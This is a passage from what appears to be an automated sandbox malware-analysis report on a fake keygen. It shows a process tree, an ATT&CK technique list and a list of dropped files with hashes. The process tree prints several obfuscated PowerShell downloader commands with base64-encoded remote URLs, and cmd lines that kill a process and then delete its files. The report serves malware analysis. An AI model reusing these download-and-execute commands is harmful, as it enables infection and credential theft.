New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);gemjhbnrwydsof $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                4⤵
                • Blocklisted process makes network request
                • Loads dropped DLL
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1688
                • C:\Users\Public\rae.exe
                  "C:\Users\Public\rae.exe"
                  5⤵
                  • Executes dropped EXE
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2536
                  • C:\Windows\SysWOW64\WScript.exe
                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs"
                    6⤵
                    • Loads dropped DLL
                    PID:2280
                    • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                      "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                      7⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Suspicious use of SetThreadContext
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2132
                      • C:\Windows\SysWOW64\WScript.exe
                        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs"
                        8⤵
                        • Loads dropped DLL
                        PID:852
                        • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                          "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                          9⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Suspicious use of SetThreadContext
                          • Suspicious use of AdjustPrivilegeToken
                          PID:788
                          • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                            "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                            10⤵
                            • Executes dropped EXE
                            PID:2708
                      • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                        "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                        8⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Checks processor information in registry
                        PID:2848
                        • C:\Windows\SysWOW64\cmd.exe
                          "C:\Windows\System32\cmd.exe" /c taskkill /pid 2848 & erase C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe & RD /S /Q C:\\ProgramData\\791223461193269\\* & exit
                          9⤵
                            PID:1216
                            • C:\Windows\SysWOW64\taskkill.exe
                              taskkill /pid 2848
                              10⤵
                              • Kills process with taskkill
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1848
                    • C:\Users\Public\rae.exe
                      "C:\Users\Public\rae.exe"
                      6⤵
                      • Executes dropped EXE
                      PID:1932
                    • C:\Users\Public\rae.exe
                      "C:\Users\Public\rae.exe"
                      6⤵
                      • Executes dropped EXE
                      PID:2708
                    • C:\Users\Public\rae.exe
                      "C:\Users\Public\rae.exe"
                      6⤵
                      • Executes dropped EXE
                      PID:2744
                    • C:\Users\Public\rae.exe
                      "C:\Users\Public\rae.exe"
                      6⤵
                      • Executes dropped EXE
                      PID:2808
                    • C:\Users\Public\rae.exe
                      "C:\Users\Public\rae.exe"
                      6⤵
                      • Executes dropped EXE
                      PID:2820
                    • C:\Users\Public\rae.exe
                      "C:\Users\Public\rae.exe"
                      6⤵
                      • Executes dropped EXE
                      PID:1940
                    • C:\Users\Public\rae.exe
                      "C:\Users\Public\rae.exe"
                      6⤵
                      • Executes dropped EXE
                      PID:1836
                    • C:\Users\Public\rae.exe
                      "C:\Users\Public\rae.exe"
                      6⤵
                      • Executes dropped EXE
                      PID:1944
                    • C:\Users\Public\rae.exe
                      "C:\Users\Public\rae.exe"
                      6⤵
                      • Executes dropped EXE
                      PID:2872
                    • C:\Users\Public\rae.exe
                      "C:\Users\Public\rae.exe"
                      6⤵
                      • Executes dropped EXE
                      PID:2096
                    • C:\Users\Public\rae.exe
                      "C:\Users\Public\rae.exe"
                      6⤵
                      • Executes dropped EXE
                      PID:1472
                    • C:\Users\Public\rae.exe
                      "C:\Users\Public\rae.exe"
                      6⤵
                      • Executes dropped EXE
                      PID:2720
                    • C:\Users\Public\rae.exe
                      "C:\Users\Public\rae.exe"
                      6⤵
                      • Executes dropped EXE
                      PID:2876
                    • C:\Users\Public\rae.exe
                      "C:\Users\Public\rae.exe"
                      6⤵
                      • Executes dropped EXE
                      PID:3028
                    • C:\Users\Public\rae.exe
                      "C:\Users\Public\rae.exe"
                      6⤵
                      • Executes dropped EXE
                      PID:652
                    • C:\Users\Public\rae.exe
                      "C:\Users\Public\rae.exe"
                      6⤵
                      • Executes dropped EXE
                      PID:2892
                    • C:\Users\Public\rae.exe
                      "C:\Users\Public\rae.exe"
                      6⤵
                      • Executes dropped EXE
                      PID:896
                    • C:\Users\Public\rae.exe
                      "C:\Users\Public\rae.exe"
                      6⤵
                      • Executes dropped EXE
                      PID:2764
                    • C:\Users\Public\rae.exe
                      "C:\Users\Public\rae.exe"
                      6⤵
                      • Executes dropped EXE
                      PID:2228
                    • C:\Users\Public\rae.exe
                      "C:\Users\Public\rae.exe"
                      6⤵
                      • Executes dropped EXE
                      PID:2964
                    • C:\Users\Public\rae.exe
                      "C:\Users\Public\rae.exe"
                      6⤵
                      • Executes dropped EXE
                      PID:512
                    • C:\Users\Public\rae.exe
                      "C:\Users\Public\rae.exe"
                      6⤵
                      • Executes dropped EXE
                      PID:2324
                    • C:\Users\Public\rae.exe
                      "C:\Users\Public\rae.exe"
                      6⤵
                      • Executes dropped EXE
                      PID:2336
                    • C:\Users\Public\rae.exe
                      "C:\Users\Public\rae.exe"
                      6⤵
                      • Executes dropped EXE
                      PID:2364
                    • C:\Users\Public\rae.exe
                      "C:\Users\Public\rae.exe"
                      6⤵
                      • Executes dropped EXE
                      PID:2392
                    • C:\Users\Public\rae.exe
                      "C:\Users\Public\rae.exe"
                      6⤵
                      • Executes dropped EXE
                      PID:2376
                    • C:\Users\Public\rae.exe
                      "C:\Users\Public\rae.exe"
                      6⤵
                      • Executes dropped EXE
                      PID:2412
                    • C:\Users\Public\rae.exe
                      "C:\Users\Public\rae.exe"
                      6⤵
                      • Executes dropped EXE
                      PID:1060
                    • C:\Users\Public\rae.exe
                      "C:\Users\Public\rae.exe"
                      6⤵
                      • Executes dropped EXE
                      PID:968
                    • C:\Users\Public\rae.exe
                      "C:\Users\Public\rae.exe"
                      6⤵
                      • Executes dropped EXE
                      PID:2168
              • C:\Windows\SysWOW64\mshta.exe
                "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\31F9.tmp\b1.hta"
                3⤵
                • Modifies Internet Explorer settings
                • Suspicious use of WriteProcessMemory
                PID:268
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL ftdrmoulpbhgsc $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;ftdrmoulpbhgsc rfmngajuyepx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rfmngajuyepx;ftdrmoulpbhgsc hnjmzobgr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3Bkc2hjanZudi51Zy96eGN2Yi5leGU=';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);hnjmzobgr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                  4⤵
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1116
              • C:\Windows\SysWOW64\timeout.exe
                timeout 2
                3⤵
                • Delays execution with timeout.exe
                PID:760
              • C:\Windows\SysWOW64\mshta.exe
                "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\31F9.tmp\ba.hta"
                3⤵
                • Modifies Internet Explorer settings
                • Suspicious use of WriteProcessMemory
                PID:916
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL vfudzcotabjeq $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;vfudzcotabjeq urdjneqmx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|urdjneqmx;vfudzcotabjeq wuirkcyfmgjql $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKRA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);wuirkcyfmgjql $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                  4⤵
                  • Blocklisted process makes network request
                  • Loads dropped DLL
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:792
                  • C:\Users\Public\cva.exe
                    "C:\Users\Public\cva.exe"
                    5⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of SetThreadContext
                    • Suspicious behavior: MapViewOfSection
                    • Suspicious use of SetWindowsHookEx
                    PID:2752
                    • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                      "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                      6⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Suspicious use of SetThreadContext
                      • Suspicious behavior: MapViewOfSection
                      • Suspicious use of SetWindowsHookEx
                      PID:2860
                      • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                        "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                        7⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Checks processor information in registry
                        PID:948
                        • C:\Windows\SysWOW64\cmd.exe
                          "C:\Windows\System32\cmd.exe" /c taskkill /pid 948 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\554645471175772\\* & exit
                          8⤵
                            PID:1520
                            • C:\Windows\SysWOW64\taskkill.exe
                              taskkill /pid 948
                              9⤵
                              • Kills process with taskkill
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1236
                      • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                        "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                        6⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Suspicious use of SetThreadContext
                        • Suspicious behavior: MapViewOfSection
                        • Suspicious use of SetWindowsHookEx
                        PID:2892
                        • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                          "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                          7⤵
                          • Executes dropped EXE
                          PID:900
                      • C:\Users\Public\cva.exe
                        "C:\Users\Public\cva.exe"
                        6⤵
                        • Executes dropped EXE
                        PID:3020
                • C:\Windows\SysWOW64\mshta.exe
                  "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\31F9.tmp\ba1.hta"
                  3⤵
                  • Modifies Internet Explorer settings
                  • Suspicious use of WriteProcessMemory
                  PID:1256
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL wvroy $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;wvroy bwskyfgqtipu $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bwskyfgqtipu;wvroy shlevpgb $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3JiY3h2bmIudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);shlevpgb $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                    4⤵
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1864

            Network

            MITRE ATT&CK Matrix ATT&CK v6

            Persistence

            Modify Existing Service

            1
            T1031

            Defense Evasion

            Modify Registry

            4
            T1112

            Disabling Security Tools

            2
            T1089

            Install Root Certificate

            1
            T1130

            Credential Access

            Credentials in Files

            3
            T1081

            Discovery

            Query Registry

            2
            T1012

            System Information Discovery

            2
            T1082

            Collection

            Data from Local System

            3
            T1005

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\ProgramData\MSVCP140.dll
            • C:\ProgramData\VCRUNTIME140.dll
            • C:\ProgramData\freebl3.dll
            • C:\ProgramData\mozglue.dll
            • C:\ProgramData\mozglue.dll
            • C:\ProgramData\msvcp140.dll
            • C:\ProgramData\nss3.dll
              MD5

              bfac4e3c5908856ba17d41edcd455a51

              SHA1

              8eec7e888767aa9e4cca8ff246eb2aacb9170428

              SHA256

              e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

              SHA512

              2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

            • C:\ProgramData\nss3.dll
              MD5

              bfac4e3c5908856ba17d41edcd455a51

              SHA1

              8eec7e888767aa9e4cca8ff246eb2aacb9170428

              SHA256

              e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

              SHA512

              2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

            • C:\ProgramData\softokn3.dll
            • C:\ProgramData\softokn3.dll
            • C:\ProgramData\sqlite3.dll
            • C:\ProgramData\sqlite3.dll
            • C:\ProgramData\vcruntime140.dll
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_0811a9c2-a874-4b56-8164-3e681494adf7
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_231c2208-0720-4eec-b9f1-8bba11abd9fa
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_235184f8-dcca-4459-ace7-181c154dff79
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_235184f8-dcca-4459-ace7-181c154dff79
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_235184f8-dcca-4459-ace7-181c154dff79
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_235184f8-dcca-4459-ace7-181c154dff79
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_235184f8-dcca-4459-ace7-181c154dff79
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_235184f8-dcca-4459-ace7-181c154dff79
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_57c6647c-75fc-47bb-8ce4-3b8f0921c533
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6d5fa298-996f-4fc9-9c01-b2226cbdaeba
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_79fd0d50-bd11-4c75-a678-52e7f64af668
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7d6878ec-2a8b-418c-8f2b-b6fcd4b50cf8
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_bc096452-becd-452e-ba89-eda27597e3c9
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_de4eedb8-4762-4c56-b80c-203df3aa6fa8
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e43ce3f6-b60d-4b70-bed1-86e53bf07360
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_f6523459-e7ab-42b1-8d88-5af1cf7de5b4
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fabbb9cf-9b8c-4b2f-b33d-0de7a9a3a10e
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
            • C:\Users\Admin\AppData\Local\Temp\1Y6WstDKOg.exe
              MD5

              013db621a3351e3fb049efd2ccad79ff

              SHA1

              a23394ea54dbc5342a77938a2c285ee616185560

              SHA256

              df1bda6183201e4dc1bc6f6425361a565413e71f09da0648b0c82b39786af27a

              SHA512

              1bf6d076677b234c9da7cbc720fc64632b587b4223b5370a7ca3d53c4d59fa59ef117957b1646c92ba80dac332f6c1c313060d35de7236b2585e5bed00d79229

            • C:\Users\Admin\AppData\Local\Temp\31F9.tmp\Keygen.exe
            • C:\Users\Admin\AppData\Local\Temp\31F9.tmp\Keygen.exe
            • C:\Users\Admin\AppData\Local\Temp\31F9.tmp\b.hta
            • C:\Users\Admin\AppData\Local\Temp\31F9.tmp\b1.hta
            • C:\Users\Admin\AppData\Local\Temp\31F9.tmp\ba.hta
            • C:\Users\Admin\AppData\Local\Temp\31F9.tmp\ba1.hta
            • C:\Users\Admin\AppData\Local\Temp\31F9.tmp\m.hta
            • C:\Users\Admin\AppData\Local\Temp\31F9.tmp\m1.hta
            • C:\Users\Admin\AppData\Local\Temp\31F9.tmp\start.bat
            • C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs
            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
            • C:\Users\Admin\AppData\Local\Temp\LDphwj0GPe.exe
            • C:\Users\Admin\AppData\Local\Temp\LDphwj0GPe.exe
            • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
            • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
            • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
            • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
            • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
            • C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs
            • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
            • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
            • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
            • C:\Users\Admin\AppData\Local\Temp\dtg6frCXmr.exe
            • C:\Users\Admin\AppData\Local\Temp\dtg6frCXmr.exe
            • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
            • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
            • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
            • C:\Users\Admin\AppData\Local\Temp\q8aqLvXPiQ.exe
            • C:\Users\Admin\AppData\Local\Temp\q8aqLvXPiQ.exe
            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
            • C:\Users\Public\cva.exe
            • C:\Users\Public\cva.exe
            • C:\Users\Public\cva.exe
            • C:\Users\Public\iep.exe
            • C:\Users\Public\iep.exe
            • C:\Users\Public\iep.exe
            • C:\Users\Public\rae.exe
            • C:\Users\Public\rae.exe
            • C:\Users\Public\rae.exe
            • C:\Users\Public\rae.exe
            • C:\Users\Public\rae.exe
            • C:\Users\Public\rae.exe
            • C:\Users\Public\rae.exe
            • C:\Users\Public\rae.exe
            • C:\Users\Public\rae.exe
            • C:\Users\Public\rae.exe
            • C:\Users\Public\rae.exe
            • C:\Users\Public\rae.exe
            • C:\Users\Public\rae.exe
            • C:\Users\Public\rae.exe
            • C:\Users\Public\rae.exe
            • C:\Users\Public\rae.exe
            • C:\Users\Public\rae.exe
            • C:\Users\Public\rae.exe
            • C:\Users\Public\rae.exe
            • C:\Users\Public\rae.exe
            • C:\Users\Public\rae.exe
            • C:\Users\Public\rae.exe
            • C:\Users\Public\rae.exe
            • C:\Users\Public\rae.exe
            • C:\Users\Public\rae.exe
            • C:\Users\Public\rae.exe
            • C:\Users\Public\rae.exe
            • C:\Users\Public\rae.exe
            • C:\Users\Public\rae.exe
            • C:\Users\Public\rae.exe
            • C:\Users\Public\rae.exe
            • C:\Users\Public\rae.exe
            • \??\PIPE\srvsvc
            • \??\PIPE\srvsvc
            • \ProgramData\mozglue.dll
            • \ProgramData\mozglue.dll
            • \ProgramData\mozglue.dll
            • \ProgramData\msvcp140.dll
            • \ProgramData\msvcp140.dll
            • \ProgramData\msvcp140.dll
            • \ProgramData\nss3.dll
              MD5

              bfac4e3c5908856ba17d41edcd455a51

              SHA1

              8eec7e888767aa9e4cca8ff246eb2aacb9170428

              SHA256

              e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

              SHA512

              2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

            • \ProgramData\nss3.dll
              MD5

              bfac4e3c5908856ba17d41edcd455a51

              SHA1

              8eec7e888767aa9e4cca8ff246eb2aacb9170428

              SHA256

              e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

              SHA512

              2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

            • \ProgramData\nss3.dll
              MD5

              bfac4e3c5908856ba17d41edcd455a51

              SHA1

              8eec7e888767aa9e4cca8ff246eb2aacb9170428

              SHA256

              e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

              SHA512

              2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

            • \ProgramData\sqlite3.dll
            • \ProgramData\sqlite3.dll
            • \ProgramData\sqlite3.dll
            • \ProgramData\vcruntime140.dll
            • \ProgramData\vcruntime140.dll
            • \ProgramData\vcruntime140.dll
            • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
            • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
            • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\mozglue.dll
            • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\msvcp140.dll
            • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\nss3.dll
              MD5

              02cc7b8ee30056d5912de54f1bdfc219

              SHA1

              a6923da95705fb81e368ae48f93d28522ef552fb

              SHA256

              1989526553fd1e1e49b0fea8036822ca062d3d39c4cab4a37846173d0f1753d5

              SHA512

              0d5dfcf4fb19b27246fa799e339d67cd1b494427783f379267fb2d10d615ffb734711bab2c515062c078f990a44a36f2d15859b1dacd4143dcc35b5c0cee0ef5

            • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\softokn3.dll
            • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\vcruntime140.dll
            • \Users\Admin\AppData\LocalLow\sqlite3.dll
            • \Users\Admin\AppData\Local\Temp\1Y6WstDKOg.exe
              MD5

              013db621a3351e3fb049efd2ccad79ff

              SHA1

              a23394ea54dbc5342a77938a2c285ee616185560

